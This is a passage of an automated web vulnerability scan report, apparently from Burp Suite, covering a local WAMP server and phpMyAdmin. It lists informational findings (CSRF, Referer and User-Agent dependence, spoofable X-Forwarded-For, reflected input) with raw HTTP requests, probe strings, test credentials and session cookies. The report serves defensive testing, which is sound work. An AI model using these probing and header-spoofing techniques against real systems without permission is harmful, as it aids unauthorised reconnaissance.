POST /add_vhost.php?lang=english HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://sGNou.com/add_vhost.php?lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 135
Cookie: PHPSESSID=ijpljt3jfnhra9b1smq3cka20p; security=low

vh_name=176621&vh_folder=711144&vh_ip=182032&checkadd=1934982712&submit=Start+the+creation+of+the+VirtualHost+%28May+take+a+while...%29

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:13:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4972
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="fr">
   <head>
       <title>Ajouter un "Virtual Host"</title>
       <meta charset="UTF-8">
       <style>
           * {
               margin: 0;
               padding: 0;
           }

           html {
               background:
...[SNIP]...
15.2. http://localhost/phpmyadmin/index.php
Previous  Next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.

The original request contains parameters that look like they may be anti-CSRF tokens. However the request is successful if these parameters are removed.

Request 1

POST /phpmyadmin/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Cookie: pma_lang=en; phpMyAdmin=1bg782nlrv2jgqql6iul04nac0

set_session=1bg782nlrv2jgqql6iul04nac0&pma_username=IRyDYmDn&pma_password=p9A%21a6t%21D6&server=1&target=index.php&lang=en&token=YV%2cge%5dj%243LyLHn*%7f

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:47 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=arhr9tg2gf5cpmqke7p91fbucm; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:01:59 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:01:59 +0000
Set-Cookie: phpMyAdmin=arhr9tg2gf5cpmqke7p91fbucm; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=ah67mqmknen309knsjn9k66qvf; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14587
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...

Request 2

POST /phpmyadmin/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://SchTt.com/phpmyadmin/
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Cookie: pma_lang=en; phpMyAdmin=1bg782nlrv2jgqql6iul04nac0; security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

set_session=1bg782nlrv2jgqql6iul04nac0&pma_username=IRyDYmDn&pma_password=p9A%21a6t%21D6&server=1&target=index.php&lang=en&token=YV%2cge%5dj%243LyLHn*%7f

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:24:43 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=vfugbduu7cc6smhnf50dv891po; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:24:44 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:24:44 +0000
Set-Cookie: phpMyAdmin=vfugbduu7cc6smhnf50dv891po; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=ie536fvh2ai6iso9olfkr8e56k; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14593
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
16. Referer-dependent response
Previous  Next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /

Issue description

Application responses may depend systematically on the presence or absence of the Referer header in requests. This behavior does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build access controls. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.

Vulnerability classifications

Request 1

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">localhost </td></tr>
<tr><td class="e">SERVER_ADDR </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">SERVER_PORT </td><td class="v">80 </td></tr>
<tr><td class="e">REMOTE_ADDR </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">DOCUMENT_ROOT </td><td class="v">C:/wamp64/www </td></tr>
<tr><td class="e">REQUEST_SCHEME </td><td class="v">http </td></tr>
<tr><td class="e">CONTEXT_PREFIX </td><td class="v">
<i>
...[SNIP]...
</th></tr>
<tr><td class="e">HTTP Request </td><td class="v">GET /?phpinfo=-1 HTTP/1.1 </td></tr>
<tr><td class="e">Host </td><td class="v">localhost </td></tr>
<tr><td class="e">Accept-Encoding </td><td class="v">gzip, deflate </td></tr>
<tr><td class="e">Accept </td><td class="v">*/* </td></tr>
<tr><td class="e">Accept-Language </td><td class="v">en </td></tr>
<tr><td class="e">User-Agent </td><td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) </td>
</tr>
...[SNIP]...
</th></tr>
<tr><td class="e">$_REQUEST['phpinfo']</td><td class="v">-1</td></tr>
<tr><td class="e">$_GET['phpinfo']</td><td class="v">-1</td></tr>
<tr><td class="e">$_COOKIE['security']</td><td class="v">low</td></tr>
<tr><td class="e">$_COOKIE['PHPSESSID']</td><td class="v">ijpljt3jfnhra9b1smq3cka20p</td></tr>
<tr><td class="e">$_SERVER['HTTP_HOST']</td><td class="v">localhost</td></tr>
<tr><td class="e">$_SERVER['HTTP_ACCEPT_ENCODING']</td><td class="v">gzip, deflate</td>
</tr>
...[SNIP]...

Request 2

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
17. Spoofable client IP address
Previous  Next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /

Issue description

If an application trusts an HTTP request header like X-Forwarded-For to accurately specify the remote IP address of the connecting client, then malicious clients can spoof their IP address. This behavior does not necessarily constitute a security vulnerability, however some applications use client IP addresses to enforce access controls and rate limits. For example, an application might expose administrative functionality only to clients connecting from the local IP address of the server, or allow a certain number of failed login attempts from each unique IP address. Consider reviewing relevant functionality to determine whether this might be the case.

Issue remediation

HTTP request headers such as X-Forwarded-For, True-Client-IP, and X-Real-IP are not a robust foundation on which to build any security measures, such as access controls. Any such measures should be replaced with more secure alternatives that are not vulnerable to spoofing.

If the platform application server returns incorrect information about the client's IP address due to the presence of any particular HTTP request header, then the server may need to be reconfigured, or an alternative method of identifying clients should be used.

Vulnerability classifications

Request 1

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">80 </td></tr>
<tr><td class="e">REMOTE_ADDR </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">DOCUMENT_ROOT </td><td class="v">C:/wamp64/www </td></tr>
<tr><td class="e">REQUEST_SCHEME </td><td class="v">http </td></tr>
<tr><td class="e">CONTEXT_PREFIX </td><td class="v">
<i>
...[SNIP]...
</th></tr>
<tr><td class="e">HTTP Request </td><td class="v">GET /?phpinfo=-1 HTTP/1.1 </td></tr>
<tr><td class="e">Host </td><td class="v">localhost </td></tr>
<tr><td class="e">Accept-Encoding </td><td class="v">gzip, deflate </td></tr>
<tr><td class="e">Accept </td><td class="v">*/* </td>
</tr>
...[SNIP]...
</th></tr>
<tr><td class="e">$_REQUEST['phpinfo']</td><td class="v">-1</td></tr>
<tr><td class="e">$_GET['phpinfo']</td><td class="v">-1</td></tr>
<tr><td class="e">$_COOKIE['security']</td><td class="v">low</td></tr>
<tr><td class="e">$_COOKIE['PHPSESSID']</td><td class="v">ijpljt3jfnhra9b1smq3cka20p</td>
</tr>
...[SNIP]...

Request 2

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/
X-Forwarded-For: 127.0.0.1

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
18. User agent-dependent response
Previous  Next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /

Issue description

Application responses may depend systematically on the value of the User-Agent header in requests. This behavior does not itself constitute a security vulnerability, but may point towards additional attack surface within the application, which may contain vulnerabilities.

This behavior often arises because applications provide different user interfaces for desktop and mobile users. Mobile interfaces have often been less thoroughly tested for vulnerabilities such as cross-site scripting, and often have simpler authentication and session handling mechanisms that may contain problems that are not present in the full interface.

To review the interface provided by the alternate User-Agent header, you can configure a match/replace rule in Proxy to modify the User-Agent header in all requests, and then browse the application in the normal way using your normal browser.

Vulnerability classifications

Request 1

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) </td>
...[SNIP]...
<td class="v">security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p </td></tr>
<tr><td class="e">HTTP_X_ORIGINATING_IP </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">HTTP_X_FORWARDED_FOR </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">HTTP_X_REMOTE_IP </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">HTTP_X_REMOTE_ADDR </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">HTTP_X_CLIENT_IP </td><td class="v">127.0.0.1
</td>
...[SNIP]...
<td class="v">54976 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) </td>
...[SNIP]...
<td class="v">security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p </td></tr>
<tr><td class="e">X-Originating-IP </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">X-Forwarded-For </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">X-Remote-IP </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">X-Remote-Addr </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">X-Client-IP </td><td class="v">127.0.0.1
</td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">0 </td>
...[SNIP]...
<td class="v">18 </td>
...[SNIP]...
<td class="v">6 </td>
...[SNIP]...
<td class="v">19015936 </td>
...[SNIP]...
<td class="v">115201792 </td>
...[SNIP]...
<td class="v">400792 </td>
...[SNIP]...
<td class="v">7987816 </td>
...[SNIP]...
<td class="v">6 </td>
...[SNIP]...
<td class="v">12 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</td>
...[SNIP]...
<td class="v">security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p</td></tr>
<tr><td class="e">$_SERVER['HTTP_X_ORIGINATING_IP']</td><td class="v">127.0.0.1</td></tr>
<tr><td class="e">$_SERVER['HTTP_X_FORWARDED_FOR']</td><td class="v">127.0.0.1</td></tr>
<tr><td class="e">$_SERVER['HTTP_X_REMOTE_IP']</td><td class="v">127.0.0.1</td></tr>
<tr><td class="e">$_SERVER['HTTP_X_REMOTE_ADDR']</td><td class="v">127.0.0.1</td></tr>
<tr><td class="e">$_SERVER['HTTP_X_CLIENT_IP']</td><td class="v">127.0.0.1
</td>
...[SNIP]...
<td class="v">54976</td>
...[SNIP]...
<td class="v">1539896499.792</td>
...[SNIP]...
<td class="v">1539896499</td>
...[SNIP]...

Request 2

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Connection: close
Referer: http://localhost/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 </td>
...[SNIP]...
<td class="v">59391 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 </td>
...[SNIP]...
<td class="v">190428 </td>
...[SNIP]...
<td class="v">235395 </td>
...[SNIP]...
<td class="v">9492 </td>
...[SNIP]...
<td class="v">5153 </td>
...[SNIP]...
<td class="v">20612 </td>
...[SNIP]...
<td class="v">37968 </td>
...[SNIP]...
<td class="v">7293 </td>
...[SNIP]...
<td class="v">1988 </td>
...[SNIP]...
<td class="v">663 </td>
...[SNIP]...
<td class="v">663 </td>
...[SNIP]...
<td class="v">1326 </td>
...[SNIP]...
<td class="v">433 </td>
...[SNIP]...
<td class="v">18446744073709549859 </td>
...[SNIP]...
<td class="v">18446744073709551546 </td>
...[SNIP]...
<td class="v">1325 </td>
...[SNIP]...
<td class="v">9877 </td>
...[SNIP]...
<td class="v">7150939 </td>
...[SNIP]...
<td class="v">31258 </td>
...[SNIP]...
<td class="v">8153416 </td>
...[SNIP]...
<td class="v">56533 </td>
...[SNIP]...
<td class="v">15498806 </td>
...[SNIP]...
<td class="v">183 </td>
...[SNIP]...
<td class="v">291543 </td>
...[SNIP]...
<td class="v">560 </td>
...[SNIP]...
<td class="v">145040 </td>
...[SNIP]...
<td class="v">1219 </td>
...[SNIP]...
<td class="v">463082 </td>
...[SNIP]...
<td class="v">7656 </td>
...[SNIP]...
<td class="v">7762 </td>
...[SNIP]...
<td class="v">476 </td>
...[SNIP]...
<td class="v">1325 </td>
...[SNIP]...
<td class="v">663 </td>
...[SNIP]...
<td class="v">31428 </td>
...[SNIP]...
<td class="v">1210 </td>
...[SNIP]...
<td class="v">42703600 </td>
...[SNIP]...
<td class="v">91514128 </td>
...[SNIP]...
<td class="v">2643896 </td>
...[SNIP]...
<td class="v">5744712 </td>
...[SNIP]...
<td class="v">963 </td>
...[SNIP]...
<td class="v">2098 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3</td>
...[SNIP]...
<td class="v">59391</td>
...[SNIP]...
<td class="v">1539896741.358</td>
...[SNIP]...
<td class="v">1539896741</td>
...[SNIP]...
19. Input returned in response (reflected)
Previous  Next

There are 381 instances of this issue:

Issue background

Reflection of input arises when data is copied from a request and echoed into the application's immediate response.

Input being returned in application responses is not a vulnerability in its own right. However, it is a prerequisite for many client-side vulnerabilities, including cross-site scripting, open redirection, content spoofing, and response header injection. Additionally, some server-side vulnerabilities such as SQL injection are often easier to identify and exploit when input is returned in responses. In applications where input retrieval is rare and the environment is resistant to automated testing (for example, due to a web application firewall), it might be worth subjecting instances of it to focused manual testing.

Vulnerability classifications



19.1. http://localhost/ [Referer HTTP header]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the application's response.

Request 1

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/vjj355e9a0

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:40 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">http://localhost/vjj355e9a0 </td>
...[SNIP]...
<td class="v">http://localhost/vjj355e9a0 </td>
...[SNIP]...
<td class="v">http://localhost/vjj355e9a0</td>
...[SNIP]...
19.2. http://localhost/ [User-Agent HTTP header]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into the application's response.

Request 1

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)hiorys1h29
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)hiorys1h29 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)hiorys1h29 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)hiorys1h29</td>
...[SNIP]...
19.3. http://localhost/ [lang parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The value of the lang request parameter is copied into the application's response.

Request 1

GET /?lang=czechal0cvq1gr3 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 5586
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
   <title>WAMPSERVER Homepage</title>
   <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=de
...[SNIP]...
<a href='add_vhost.php?lang=czechal0cvq1gr3'>
...[SNIP]...
19.4. http://localhost/ [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /?phpinfo=-1&951zddc7ky=1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">phpinfo=-1&amp;951zddc7ky=1 </td>
...[SNIP]...
<td class="v">/?phpinfo=-1&amp;951zddc7ky=1 </td>
...[SNIP]...
<td class="v">GET /?phpinfo=-1&amp;951zddc7ky=1 HTTP/1.1 </td>
...[SNIP]...
<td class="e">$_REQUEST['951zddc7ky']</td>
...[SNIP]...
<td class="e">$_GET['951zddc7ky']</td>
...[SNIP]...
<td class="v">phpinfo=-1&amp;951zddc7ky=1</td>
...[SNIP]...
<td class="v">/?phpinfo=-1&amp;951zddc7ky=1</td>
...[SNIP]...
19.5. http://localhost/ [phpinfo parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The value of the phpinfo request parameter is copied into the application's response.

Request 1

GET /?phpinfo=-1qw8g47wtwb HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:42 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">phpinfo=-1qw8g47wtwb </td>
...[SNIP]...
<td class="v">/?phpinfo=-1qw8g47wtwb </td>
...[SNIP]...
<td class="v">GET /?phpinfo=-1qw8g47wtwb HTTP/1.1 </td>
...[SNIP]...
<td class="v">-1qw8g47wtwb</td>
...[SNIP]...
<td class="v">-1qw8g47wtwb</td>
...[SNIP]...
<td class="v">phpinfo=-1qw8g47wtwb</td>
